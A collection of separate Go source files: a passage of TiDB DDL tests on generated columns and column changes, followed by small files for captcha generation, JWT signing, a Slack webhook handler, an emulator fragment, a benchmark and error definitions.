// Check create table with virtual and stored generated columns.
tk.MustExec(`CREATE TABLE test_gv_ddl(a int, b int as (a+8) virtual, c int as (b + 2) stored)`)
// Check desc table with virtual and stored generated columns.
result := tk.MustQuery(`DESC test_gv_ddl`)
result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
// Check show create table with virtual and stored generated columns.
result = tk.MustQuery(`show create table test_gv_ddl`)
result.Check(testkit.Rows(
"test_gv_ddl CREATE TABLE `test_gv_ddl` (\n `a` int(11) DEFAULT NULL,\n `b` int(11) GENERATED ALWAYS AS (`a` + 8) VIRTUAL,\n `c` int(11) GENERATED ALWAYS AS (`b` + 2) STORED\n) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin",
))
// Check generated expression with blanks.
tk.MustExec("create table table_with_gen_col_blanks (a int, b char(20) as (cast( \r\n\t a \r\n\tas char)), c int as (a+100))")
result = tk.MustQuery(`show create table table_with_gen_col_blanks`)
result.Check(testkit.Rows("table_with_gen_col_blanks CREATE TABLE `table_with_gen_col_blanks` (\n" +
" `a` int(11) DEFAULT NULL,\n" +
" `b` char(20) GENERATED ALWAYS AS (cast(`a` as char)) VIRTUAL,\n" +
" `c` int(11) GENERATED ALWAYS AS (`a` + 100) VIRTUAL\n" +
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin"))
// Check generated expression with charset latin1 ("latin1" != mysql.DefaultCharset).
tk.MustExec("create table table_with_gen_col_latin1 (a int, b char(20) as (cast( \r\n\t a \r\n\tas char charset latin1)), c int as (a+100))")
result = tk.MustQuery(`show create table table_with_gen_col_latin1`)
result.Check(testkit.Rows("table_with_gen_col_latin1 CREATE TABLE `table_with_gen_col_latin1` (\n" +
" `a` int(11) DEFAULT NULL,\n" +
" `b` char(20) GENERATED ALWAYS AS (cast(`a` as char charset latin1)) VIRTUAL,\n" +
" `c` int(11) GENERATED ALWAYS AS (`a` + 100) VIRTUAL\n" +
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin"))
// Check generated expression with string (issue 9457).
tk.MustExec("create table table_with_gen_col_string (first_name varchar(10), last_name varchar(10), full_name varchar(255) AS (CONCAT(first_name,' ',last_name)))")
result = tk.MustQuery(`show create table table_with_gen_col_string`)
result.Check(testkit.Rows("table_with_gen_col_string CREATE TABLE `table_with_gen_col_string` (\n" +
" `first_name` varchar(10) DEFAULT NULL,\n" +
" `last_name` varchar(10) DEFAULT NULL,\n" +
" `full_name` varchar(255) GENERATED ALWAYS AS (concat(`first_name`, _utf8mb4' ', `last_name`)) VIRTUAL\n" +
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin"))
tk.MustExec("alter table table_with_gen_col_string modify column full_name varchar(255) GENERATED ALWAYS AS (CONCAT(last_name,' ' ,first_name) ) VIRTUAL")
result = tk.MustQuery(`show create table table_with_gen_col_string`)
result.Check(testkit.Rows("table_with_gen_col_string CREATE TABLE `table_with_gen_col_string` (\n" +
" `first_name` varchar(10) DEFAULT NULL,\n" +
" `last_name` varchar(10) DEFAULT NULL,\n" +
" `full_name` varchar(255) GENERATED ALWAYS AS (concat(`last_name`, _utf8mb4' ', `first_name`)) VIRTUAL\n" +
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin"))
// Test incorrect parameter count.
tk.MustGetErrCode("create table test_gv_incorrect_pc(a double, b int as (lower(a, 2)))", errno.ErrWrongParamcountToNativeFct)
tk.MustGetErrCode("create table test_gv_incorrect_pc(a double, b int as (lower(a, 2)) stored)", errno.ErrWrongParamcountToNativeFct)
genExprTests := []struct {
stmt string
err int
}{
// Drop/rename columns dependent by other column.
{`alter table test_gv_ddl drop column a`, errno.ErrDependentByGeneratedColumn},
{`alter table test_gv_ddl change column a anew int`, errno.ErrDependentByGeneratedColumn},
// Modify/change stored status of generated columns.
{`alter table test_gv_ddl modify column b bigint`, errno.ErrUnsupportedOnGeneratedColumn},
{`alter table test_gv_ddl change column c cnew bigint as (a+100)`, errno.ErrUnsupportedOnGeneratedColumn},
// Modify/change generated columns breaking prior.
{`alter table test_gv_ddl modify column b int as (c+100)`, errno.ErrGeneratedColumnNonPrior},
{`alter table test_gv_ddl change column b bnew int as (c+100)`, errno.ErrDependentByGeneratedColumn},
// Refer not exist columns in generation expression.
{`create table test_gv_ddl_bad (a int, b int as (c+8))`, errno.ErrBadField},
// Refer generated columns non prior.
{`create table test_gv_ddl_bad (a int, b int as (c+1), c int as (a+1))`, errno.ErrGeneratedColumnNonPrior},
// Virtual generated columns cannot be primary key.
{`create table test_gv_ddl_bad (a int, b int, c int as (a+b) primary key)`, errno.ErrUnsupportedOnGeneratedColumn},
{`create table test_gv_ddl_bad (a int, b int, c int as (a+b), primary key(c))`, errno.ErrUnsupportedOnGeneratedColumn},
{`create table test_gv_ddl_bad (a int, b int, c int as (a+b), primary key(a, c))`, errno.ErrUnsupportedOnGeneratedColumn},
// Add stored generated column through alter table.
{`alter table test_gv_ddl add column d int as (b+2) stored`, errno.ErrUnsupportedOnGeneratedColumn},
{`alter table test_gv_ddl modify column b int as (a + 8) stored`, errno.ErrUnsupportedOnGeneratedColumn},
// Add generated column with incorrect parameter count.
{`alter table test_gv_ddl add column z int as (lower(a, 2))`, errno.ErrWrongParamcountToNativeFct},
{`alter table test_gv_ddl add column z int as (lower(a, 2)) stored`, errno.ErrWrongParamcountToNativeFct},
// Modify generated column with incorrect parameter count.
{`alter table test_gv_ddl modify column b int as (lower(a, 2))`, errno.ErrWrongParamcountToNativeFct},
{`alter table test_gv_ddl change column b b int as (lower(a, 2))`, errno.ErrWrongParamcountToNativeFct},
}
for _, tt := range genExprTests {
tk.MustGetErrCode(tt.stmt, tt.err)
}
// Check alter table modify/change generated column.
modStoredColErrMsg := "[ddl:3106]'modifying a stored column' is not supported for generated columns."
tk.MustGetErrMsg(`alter table test_gv_ddl modify column c bigint as (b+200) stored`, modStoredColErrMsg)
result = tk.MustQuery(`DESC test_gv_ddl`)
result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
// According to https://github.com/pingcap/tidb/issues/24321, this test case is not supported.
// Although in MySQL this is a legal one.
// tk.MustExec(`alter table test_gv_ddl change column b b bigint as (a+100) virtual`)
// result = tk.MustQuery(`DESC test_gv_ddl`)
// result.Check(testkit.Rows(`a int(11) YES <nil> `, `b bigint(20) YES <nil> VIRTUAL GENERATED`, `c int(11) YES <nil> STORED GENERATED`))
tk.MustExec(`alter table test_gv_ddl change column c cnew bigint`)
result = tk.MustQuery(`DESC test_gv_ddl`)
result.Check(testkit.Rows(`a int(11) YES <nil> `, `b int(11) YES <nil> VIRTUAL GENERATED`, `cnew bigint(20) YES <nil> `))
// Test generated column `\\`.
tk.MustExec("drop table if exists t")
tk.MustExec("CREATE TABLE t(c0 TEXT AS ('\\\\'));")
tk.MustExec("insert into t values ()")
tk.MustQuery("select * from t").Check(testkit.Rows("\\"))
tk.MustExec("drop table if exists t")
tk.MustExec("CREATE TABLE t(c0 TEXT AS ('a\\\\b\\\\c\\\\'))")
tk.MustExec("insert into t values ()")
tk.MustQuery("select * from t").Check(testkit.Rows("a\\b\\c\\"))
}
func TestColumnModifyingDefinition(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
tk.MustExec("create table test2 (c1 int, c2 int, c3 int default 1, index (c1));")
tk.MustExec("alter table test2 change c2 a int not null;")
is := domain.GetDomain(tk.Session()).InfoSchema()
tbl, err := is.TableByName(model.NewCIStr("test"), model.NewCIStr("test2"))
require.NoError(t, err)
var c2 *table.Column
for _, col := range tbl.Cols() {
if col.Name.L == "a" {
c2 = col
}
}
require.True(t, mysql.HasNotNullFlag(c2.GetFlag()))
tk.MustExec("drop table if exists test2;")
tk.MustExec("create table test2 (c1 int, c2 int, c3 int default 1, index (c1));")
tk.MustExec("insert into test2(c2) values (null);")
tk.MustGetErrMsg("alter table test2 change c2 a int not null", "[ddl:1265]Data truncated for column 'a' at row 1")
tk.MustGetErrCode("alter table test2 change c1 a1 bigint not null;", mysql.WarnDataTruncated)
}
func TestColumnModifyingDefaultValue(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
tk.MustExec("create table t (a int default 1);")
tk.MustExec("alter table t change a a int default 0.00;")
ret := tk.MustQuery("show create table t").Rows()[0][1]
require.True(t, strings.Contains(ret.(string), "`a` int(11) DEFAULT '0'"))
tk.MustExec("drop table if exists t;")
tk.MustExec("create table t (a int default 1.25);")
tk.MustExec("alter table t change a a int default 2.8;")
ret = tk.MustQuery("show create table t").Rows()[0][1]
require.True(t, strings.Contains(ret.(string), "`a` int(11) DEFAULT '3'"))
tk.MustExec("drop table if exists t;")
tk.MustExec("create table t (a float default 1.25);")
tk.MustExec("alter table t change a a float default '0012.32';")
ret = tk.MustQuery("show create table t").Rows()[0][1]
require.True(t, strings.Contains(ret.(string), "`a` float DEFAULT '12.32'"))
}
func TestTransactionWithWriteOnlyColumn(t *testing.T) {
store, dom := testkit.CreateMockStoreAndDomainWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
tk.MustExec("drop table if exists t1")
tk.MustExec("create table t1 (a int key);")
transactions := [][]string{
{
"begin",
"insert into t1 set a=1",
"update t1 set a=2 where a=1",
"commit",
},
}
hook := &callback.TestDDLCallback{Do: dom}
var checkErr error
hook.OnJobRunBeforeExported = func(job *model.Job) {
if checkErr != nil {
return
}
switch job.SchemaState {
case model.StateWriteOnly:
default:
return
}
// do transaction.
for _, transaction := range transactions {
for _, sql := range transaction {
if _, checkErr = tk.Exec(sql); checkErr != nil {
checkErr = errors.Errorf("err: %s, sql: %s, job schema state: %s", checkErr.Error(), sql, job.SchemaState)
return
}
}
}
}
dom.DDL().SetHook(hook)
done := make(chan error, 1)
// test transaction on add column.
go backgroundExec(store, "test", "alter table t1 add column c int not null", done)
err := <-done
require.NoError(t, err)
require.NoError(t, checkErr)
tk.MustQuery("select a from t1").Check(testkit.Rows("2"))
tk.MustExec("delete from t1")
// test transaction on drop column.
go backgroundExec(store, "test", "alter table t1 drop column c", done)
err = <-done
require.NoError(t, err)
require.NoError(t, checkErr)
tk.MustQuery("select a from t1").Check(testkit.Rows("2"))
}
func TestModifyGeneratedColumn(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
modIdxColErrMsg := "[ddl:3106]'modifying an indexed column' is not supported for generated columns."
modStoredColErrMsg := "[ddl:3106]'modifying a stored column' is not supported for generated columns."
// Modify column with single-col-index.
tk.MustExec("drop table if exists t1;")
tk.MustExec("create table t1 (a int, b int as (a+1), index idx(b));")
tk.MustExec("insert into t1 set a=1;")
tk.MustGetErrMsg("alter table t1 modify column b int as (a+2);", modIdxColErrMsg)
tk.MustExec("drop index idx on t1;")
tk.MustExec("alter table t1 modify b int as (a+2);")
tk.MustQuery("select * from t1").Check(testkit.Rows("1 3"))
// Modify column with multi-col-index.
tk.MustExec("drop table t1;")
tk.MustExec("create table t1 (a int, b int as (a+1), index idx(a, b));")
tk.MustExec("insert into t1 set a=1;")
tk.MustGetErrMsg("alter table t1 modify column b int as (a+2);", modIdxColErrMsg)
tk.MustExec("drop index idx on t1;")
tk.MustExec("alter table t1 modify b int as (a+2);")
tk.MustQuery("select * from t1").Check(testkit.Rows("1 3"))
// Modify column with stored status to a different expression.
tk.MustExec("drop table t1;")
tk.MustExec("create table t1 (a int, b int as (a+1) stored);")
tk.MustExec("insert into t1 set a=1;")
tk.MustGetErrMsg("alter table t1 modify column b int as (a+2) stored;", modStoredColErrMsg)
// Modify column with stored status to the same expression.
tk.MustExec("drop table t1;")
tk.MustExec("create table t1 (a int, b int as (a+1) stored);")
tk.MustExec("insert into t1 set a=1;")
tk.MustExec("alter table t1 modify column b bigint as (a+1) stored;")
tk.MustExec("alter table t1 modify column b bigint as (a + 1) stored;")
tk.MustQuery("select * from t1").Check(testkit.Rows("1 2"))
// Modify column with index to the same expression.
tk.MustExec("drop table t1;")
tk.MustExec("create table t1 (a int, b int as (a+1), index idx(b));")
tk.MustExec("insert into t1 set a=1;")
tk.MustExec("alter table t1 modify column b bigint as (a+1);")
tk.MustExec("alter table t1 modify column b bigint as (a + 1);")
tk.MustQuery("select * from t1").Check(testkit.Rows("1 2"))
// Modify column from non-generated to stored generated.
tk.MustExec("drop table t1;")
tk.MustExec("create table t1 (a int, b int);")
tk.MustGetErrMsg("alter table t1 modify column b bigint as (a+1) stored;", modStoredColErrMsg)
// Modify column from stored generated to non-generated.
tk.MustExec("drop table t1;")
tk.MustExec("create table t1 (a int, b int as (a+1) stored);")
tk.MustExec("insert into t1 set a=1;")
tk.MustExec("alter table t1 modify column b int;")
tk.MustQuery("select * from t1").Check(testkit.Rows("1 2"))
}
func TestCheckColumnDefaultValue(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
tk.MustExec("drop table if exists text_default_text;")
tk.MustGetErrCode("create table text_default_text(c1 text not null default '');", errno.ErrBlobCantHaveDefault)
tk.MustGetErrCode("create table text_default_text(c1 text not null default 'scds');", errno.ErrBlobCantHaveDefault)
tk.MustExec("drop table if exists text_default_json;")
tk.MustGetErrCode("create table text_default_json(c1 json not null default '');", errno.ErrBlobCantHaveDefault)
tk.MustGetErrCode("create table text_default_json(c1 json not null default 'dfew555');", errno.ErrBlobCantHaveDefault)
tk.MustExec("drop table if exists text_default_blob;")
tk.MustGetErrCode("create table text_default_blob(c1 blob not null default '');", errno.ErrBlobCantHaveDefault)
tk.MustGetErrCode("create table text_default_blob(c1 blob not null default 'scds54');", errno.ErrBlobCantHaveDefault)
tk.MustExec("set sql_mode='';")
tk.MustExec("create table text_default_text(c1 text not null default '');")
tk.MustQuery(`show create table text_default_text`).Check(testkit.RowsWithSep("|",
"text_default_text CREATE TABLE `text_default_text` (\n"+
" `c1` text NOT NULL\n"+
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin",
))
is := domain.GetDomain(tk.Session()).InfoSchema()
tblInfo, err := is.TableByName(model.NewCIStr("test"), model.NewCIStr("text_default_text"))
require.NoError(t, err)
require.Empty(t, tblInfo.Meta().Columns[0].DefaultValue)
tk.MustExec("create table text_default_blob(c1 blob not null default '');")
tk.MustQuery(`show create table text_default_blob`).Check(testkit.RowsWithSep("|",
"text_default_blob CREATE TABLE `text_default_blob` (\n"+
" `c1` blob NOT NULL\n"+
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin",
))
is = domain.GetDomain(tk.Session()).InfoSchema()
tblInfo, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("text_default_blob"))
require.NoError(t, err)
require.Empty(t, tblInfo.Meta().Columns[0].DefaultValue)
tk.MustExec("create table text_default_json(c1 json not null default '');")
tk.MustQuery(`show create table text_default_json`).Check(testkit.RowsWithSep("|",
"text_default_json CREATE TABLE `text_default_json` (\n"+
" `c1` json NOT NULL DEFAULT 'null'\n"+
") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin",
))
is = domain.GetDomain(tk.Session()).InfoSchema()
tblInfo, err = is.TableByName(model.NewCIStr("test"), model.NewCIStr("text_default_json"))
require.NoError(t, err)
require.Equal(t, "null", tblInfo.Meta().Columns[0].DefaultValue)
}
func TestCheckConvertToCharacter(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
tk.MustExec("create table t(a varchar(10) charset binary);")
is := domain.GetDomain(tk.Session()).InfoSchema()
tbl, err := is.TableByName(model.NewCIStr("test"), model.NewCIStr("t"))
require.NoError(t, err)
tk.MustGetErrCode("alter table t modify column a varchar(10) charset utf8 collate utf8_bin", errno.ErrUnsupportedDDLOperation)
tk.MustGetErrCode("alter table t modify column a varchar(10) charset utf8mb4 collate utf8mb4_bin", errno.ErrUnsupportedDDLOperation)
tk.MustGetErrCode("alter table t modify column a varchar(10) charset latin1 collate latin1_bin", errno.ErrUnsupportedDDLOperation)
require.Equal(t, "binary", tbl.Cols()[0].GetCharset())
}
func TestAddMultiColumnsIndex(t *testing.T) {
store := testkit.CreateMockStoreWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("drop database if exists tidb;")
tk.MustExec("create database tidb;")
tk.MustExec("use tidb;")
tk.MustExec("create table tidb.test (a int auto_increment primary key, b int);")
tk.MustExec("insert tidb.test values (1, 1);")
tk.MustExec("update tidb.test set b = b + 1 where a = 1;")
tk.MustExec("insert into tidb.test values (2, 2);")
// Test that the b value is nil.
tk.MustExec("insert into tidb.test (a) values (3);")
tk.MustExec("insert into tidb.test values (4, 4);")
// Test that the b value is nil again.
tk.MustExec("insert into tidb.test (a) values (5);")
tk.MustExec("insert tidb.test values (6, 6);")
tk.MustExec("alter table tidb.test add index idx1 (a, b);")
tk.MustExec("admin check table test")
}
// For issue #31735.
func TestAddGeneratedColumnAndInsert(t *testing.T) {
store, dom := testkit.CreateMockStoreAndDomainWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
tk.MustExec("create table t1 (a int, unique kye(a))")
tk.MustExec("insert into t1 value (1), (10)")
tk1 := testkit.NewTestKit(t, store)
tk1.MustExec("use test")
d := dom.DDL()
hook := &callback.TestDDLCallback{Do: dom}
ctx := mock.NewContext()
ctx.Store = store
times := 0
var checkErr error
onJobUpdatedExportedFunc := func(job *model.Job) {
if checkErr != nil {
return
}
switch job.SchemaState {
case model.StateDeleteOnly:
_, checkErr = tk1.Exec("insert into t1 values (1) on duplicate key update a=a+1")
if checkErr == nil {
_, checkErr = tk1.Exec("replace into t1 values (2)")
}
case model.StateWriteOnly:
_, checkErr = tk1.Exec("insert into t1 values (2) on duplicate key update a=a+1")
if checkErr == nil {
_, checkErr = tk1.Exec("replace into t1 values (3)")
}
case model.StateWriteReorganization:
if checkErr == nil && job.SchemaState == model.StateWriteReorganization && times == 0 {
_, checkErr = tk1.Exec("insert into t1 values (3) on duplicate key update a=a+1")
if checkErr == nil {
_, checkErr = tk1.Exec("replace into t1 values (4)")
}
times++
}
}
}
hook.OnJobUpdatedExported.Store(&onJobUpdatedExportedFunc)
d.SetHook(hook)
tk.MustExec("alter table t1 add column gc int as ((a+1))")
tk.MustQuery("select * from t1 order by a").Check(testkit.Rows("4 5", "10 11"))
require.NoError(t, checkErr)
}
func TestColumnTypeChangeGenUniqueChangingName(t *testing.T) {
store, dom := testkit.CreateMockStoreAndDomainWithSchemaLease(t, columnModifyLease)
tk := testkit.NewTestKit(t, store)
tk.MustExec("use test")
hook := &callback.TestDDLCallback{}
var checkErr error
assertChangingColName := "_col$_c2_0"
assertChangingIdxName := "_idx$_idx_0"
onJobUpdatedExportedFunc := func(job *model.Job) {
if job.SchemaState == model.StateDeleteOnly && job.Type == model.ActionModifyColumn {
var (
newCol *model.ColumnInfo
oldColName *model.CIStr
modifyColumnTp byte
updatedAutoRandomBits uint64
changingCol *model.ColumnInfo
changingIdxs []*model.IndexInfo
)
pos := &ast.ColumnPosition{}
err := job.DecodeArgs(&newCol, &oldColName, pos, &modifyColumnTp, &updatedAutoRandomBits, &changingCol, &changingIdxs)
if err != nil {
checkErr = err
return
}
if changingCol.Name.L != assertChangingColName {
checkErr = errors.New("changing column name is incorrect")
} else if changingIdxs[0].Name.L != assertChangingIdxName {
checkErr = errors.New("changing index name is incorrect")
}
}
}
hook.OnJobUpdatedExported.Store(&onJobUpdatedExportedFunc)
d := dom.DDL()
d.SetHook(hook)
tk.MustExec("create table if not exists t(c1 varchar(256), c2 bigint, `_col$_c2` varchar(10), unique _idx$_idx(c1), unique idx(c2));")
tk.MustExec("alter table test.t change column c2 cC2 tinyint after `_col$_c2`")
require.NoError(t, checkErr)
tbl := external.GetTableByName(t, tk, "test", "t")
require.Len(t, tbl.Meta().Columns, 3)
require.Equal(t, "c1", tbl.Meta().Columns[0].Name.O)
require.Equal(t, 0, tbl.Meta().Columns[0].Offset)
require.Equal(t, "_col$_c2", tbl.Meta().Columns[1].Name.O)
require.Equal(t, 1, tbl.Meta().Columns[1].Offset)
require.Equal(t, "cC2", tbl.Meta().Columns[2].Name.O)
require.Equal(t, 2, tbl.Meta().Columns[2].Offset)
require.Len(t, tbl.Meta().Indices, 2)
require.Equal(t, "_idx$_idx", tbl.Meta().Indices[0].Name.O)
require.Equal(t, "idx", tbl.Meta().Indices[1].Name.O)
require.Len(t, tbl.Meta().Indices[0].Columns, 1)
require.Equal(t, "c1", tbl.Meta().Indices[0].Columns[0].Name.O)
require.Equal(t, 0, tbl.Meta().Indices[0].Columns[0].Offset)
require.Len(t, tbl.Meta().Indices[1].Columns, 1)
require.Equal(t, "cC2", tbl.Meta().Indices[1].Columns[0].Name.O)
require.Equal(t, 2, tbl.Meta().Indices[1].Columns[0].Offset)
assertChangingColName1 := "_col$__col$_c1_1"
assertChangingColName2 := "_col$__col$__col$_c1_0_1"
query1 := "alter table t modify column _col$_c1 tinyint"
query2 := "alter table t modify column _col$__col$_c1_0 tinyint"
onJobUpdatedExportedFunc2 := func(job *model.Job) {
if (job.Query == query1 || job.Query == query2) && job.SchemaState == model.StateDeleteOnly && job.Type == model.ActionModifyColumn {
var (
newCol *model.ColumnInfo
oldColName *model.CIStr
modifyColumnTp byte
updatedAutoRandomBits uint64
changingCol *model.ColumnInfo
changingIdxs []*model.IndexInfo
)
pos := &ast.ColumnPosition{}
err := job.DecodeArgs(&newCol, &oldColName, pos, &modifyColumnTp, &updatedAutoRandomBits, &changingCol, &changingIdxs)
if err != nil {
checkErr = err
return
}
if job.Query == query1 && changingCol.Name.L != assertChangingColName1 {
checkErr = errors.New("changing column name is incorrect")
}
if job.Query == query2 && changingCol.Name.L != assertChangingColName2 {
checkErr = errors.New("changing column name is incorrect")
}
}
}
hook.OnJobUpdatedExported.Store(&onJobUpdatedExportedFunc2)
d.SetHook(hook)
tk.MustExec("drop table if exists t")
tk.MustExec("create table if not exists t(c1 bigint, _col$_c1 bigint, _col$__col$_c1_0 bigint, _col$__col$__col$_c1_0_0 bigint)")
tk.MustExec("alter table t modify column c1 tinyint")
tk.MustExec("alter table t modify column _col$_c1 tinyint")
require.NoError(t, checkErr)
tk.MustExec("alter table t modify column _col$__col$_c1_0 tinyint")
require.NoError(t, checkErr)
tk.MustExec("alter table t change column _col$__col$__col$_c1_0_0 _col$__col$__col$_c1_0_0 tinyint")
tbl = external.GetTableByName(t, tk, "test", "t")
require.Len(t, tbl.Meta().Columns, 4)
require.Equal(t, "c1", tbl.Meta().Columns[0].Name.O)
require.Equal(t, mysql.TypeTiny, tbl.Meta().Columns[0].GetType())
require.Equal(t, 0, tbl.Meta().Columns[0].Offset)
require.Equal(t, "_col$_c1", tbl.Meta().Columns[1].Name.O)
require.Equal(t, mysql.TypeTiny, tbl.Meta().Columns[1].GetType())
require.Equal(t, 1, tbl.Meta().Columns[1].Offset)
require.Equal(t, "_col$__col$_c1_0", tbl.Meta().Columns[2].Name.O)
require.Equal(t, mysql.TypeTiny, tbl.Meta().Columns[2].GetType())
require.Equal(t, 2, tbl.Meta().Columns[2].Offset)
require.Equal(t, "_col$__col$__col$_c1_0_0", tbl.Meta().Columns[3].Name.O)
require.Equal(t, mysql.TypeTiny, tbl.Meta().Columns[3].GetType())
require.Equal(t, 3, tbl.Meta().Columns[3].Offset)
tk.MustExec("drop table if exists t")
}
|
package main
import (
"C"
"bytes"
"encoding/base64"
"image/png"
"github.com/dchest/captcha"
)
//export NewCaptcha
func NewCaptcha(identifier, _data *C.char, width, height C.int) *C.char {
data := C.GoString(_data)
var numbers []byte
for _, c := range data {
n := c - 48
if 0 <= n && n <= 9 {
numbers = append(numbers, byte(n))
}
}
img := captcha.NewImage(C.GoString(identifier), numbers, int(width), int(height))
var buf bytes.Buffer
png.Encode(&buf, img)
return C.CString(base64.StdEncoding.EncodeToString(buf.Bytes()))
}
func main() {}
|
package utils
import (
"fmt"
"time"
"github.com/dgrijalva/jwt-go"
)
var mySigningKey = []byte(GetConf().JWTKey)
var jwtExpireIn = GetConf().JWTExpireIn
// SignToken is a function to help sign a jwt token for login
func SignToken(audience string) (string, error) {
claims := jwt.StandardClaims{
Audience: audience,
IssuedAt: time.Now().Unix(),
ExpiresAt: time.Now().Unix() + jwtExpireIn,
Issuer: "MoonCakeDuty",
}
token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
tokenString, err := token.SignedString(mySigningKey)
return tokenString, err
}
// VerifyToken verify if the token is correct.
func VerifyToken(tokenString string, skipExpirationVerify bool) (*jwt.StandardClaims, error) {
token, err := jwt.ParseWithClaims(tokenString, &jwt.StandardClaims{}, func(tk *jwt.Token) (interface{}, error) {
// Don't forget to validate the alg is what you expect:
if _, ok := tk.Method.(*jwt.SigningMethodHMAC); !ok {
return nil, fmt.Errorf("Unexpected signing method: %v", tk.Header["alg"])
}
return mySigningKey, nil
})
if err != nil {
e, ok := err.(*jwt.ValidationError)
if !ok {
return nil, err
}
switch e.Errors {
case jwt.ValidationErrorExpired:
if skipExpirationVerify {
if claims, ok := token.Claims.(*jwt.StandardClaims); ok {
return claims, nil
}
break
}
fallthrough
default:
return nil, e
}
}
if claims, ok := token.Claims.(*jwt.StandardClaims); ok && token.Valid {
return claims, nil
}
return nil, fmt.Errorf("Token %s is invalid", tokenString)
}
|
package handler
import (
"fmt"
"net/http"
"github.com/naoty/slack-thread-webhook/datastore"
"github.com/naoty/slack-thread-webhook/handler/wrapper"
"github.com/nlopes/slack"
)
// Post is a handler to post messages.
type Post struct {
Channel string
Datastore datastore.Client
Slack *slack.Client
}
func (handler Post) ServeHTTP(w http.ResponseWriter, req *http.Request) {
messageParams := req.Context().Value(wrapper.PostMessageParametersKey).(slack.PostMessageParameters)
requestParams := req.Context().Value(wrapper.ParametersKey).(map[string]string)
id := requestParams["id"]
value, _ := handler.Datastore.Get(id)
if value == "" {
_, ts, err := handler.Slack.PostMessage(handler.Channel, "", messageParams)
if err != nil {
message := fmt.Sprintf("failed to post a message to slack: %v\n", err)
http.Error(w, message, http.StatusInternalServerError)
return
}
err = handler.Datastore.Set(id, ts)
if err != nil {
message := fmt.Sprintf("failed to set id: %v\n", err)
http.Error(w, message, http.StatusInternalServerError)
return
}
} else {
messageParams.ThreadTimestamp = value
_, _, err := handler.Slack.PostMessage(handler.Channel, "", messageParams)
if err != nil {
message := fmt.Sprintf("failed to post a message to slack: %v\n", err)
http.Error(w, message, http.StatusInternalServerError)
return
}
}
w.WriteHeader(http.StatusCreated)
}
|
package main
import(
"emulator"
"iop_dma"
)
type Voice struct {
left_vol, right_vol uint16
pitch uint16
adsr1, adsr2 uint16
current_envelope uint16
start_addr uint32
current_addr uint32
loop_addr uint32
loop_addr_specified bool
counter uint32
block_pos int
loop_code int
}
func (v *Voice) reset() {
v.left_vol = 0
v.right_vol = 0
v.pitch = 0
v.adsr1 = 0
v.adsr2 = 0
v.current_envelope = 0
v.start_addr = 0
v.current_addr = 0
v.loop_addr = 0
v.loop_addr_specified = false
v.counter = 0
v.block_pos = 0
v.loop_code = 0
}
type SPU_STAT struct {
DMA_finished bool
DMA_busy bool
}
var id int |
package pie
import (
"math/rand"
"testing"
)
func BenchmarkIntMedianSmall(b *testing.B) { benchmarkIntMedian(b, 20) }
func BenchmarkIntMedianMedium(b *testing.B) { benchmarkIntMedian(b, 800) }
func BenchmarkIntMedianLarge(b *testing.B) { benchmarkIntMedian(b, 1000000) }
func benchmarkIntMedian(b *testing.B, size int) {
// Make the random numbers below deterministic
rand.Seed(123)
a := make(Ints, size)
for i := range a {
// As many possible values as slots in the slice.
// Negatives and positives.
// Variety, with some duplicates.
a[i] = -size/2 + rand.Intn(size)
}
b.ResetTimer()
for i := 0; i < b.N; i++ {
m := a.Median()
sinkInts += m
}
}
// Prevent compiler from agressively optimizing away the result
var sinkInts int
|
// Copyright (c) 2019 Leonardo Faoro. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// Package ascon wraps the Ascon encryption algorithm.
//
// ref: https://ascon.iaik.tugraz.at/specification.html
package ascon
|
package state
var Health = false
var Ready = false
var Drain = false
|
package main
import "errors"
var BadRequestError = errors.New("Bad_Request_Error")
var InvalidEmailOrPassword = errors.New("Invalid_Email_Or_Password")
var InvalidEmail = errors.New("Invalid_Email")
var IncorrectPassword = errors.New("Incorrect_Password")
var EmptyRows = errors.New("Empty_Rows")
var ViolateUNEmail = errors.New("Violate_UN_Email")
var ViolateUNUsername = errors.New("Violate_UN_Username")
var AddFavProductError = errors.New("Add_Fav_Product_Error")
var RemoveFavProductError = errors.New("Remove_Fav_Product_Error")
var EmptyFavProductList = errors.New("Empty_Fav_Product_List")
var VerifyEmailError = errors.New("Verify_Email_Error")
var IncorrectNewPasswordFormat = errors.New("Incorrect_New_Password_Format")
var PasswordMatchingIssue = errors.New("Password_Matching_Issue")
var WeakPassword = errors.New("Weak_Password")
var ResetPasswordError = errors.New("Reset_Password_Error")
var SameResetPwInput = errors.New("Same_Reset_Password_Input")
var RequestResetPassTokenError = errors.New("Request_Reset_Pass_Token_Error")
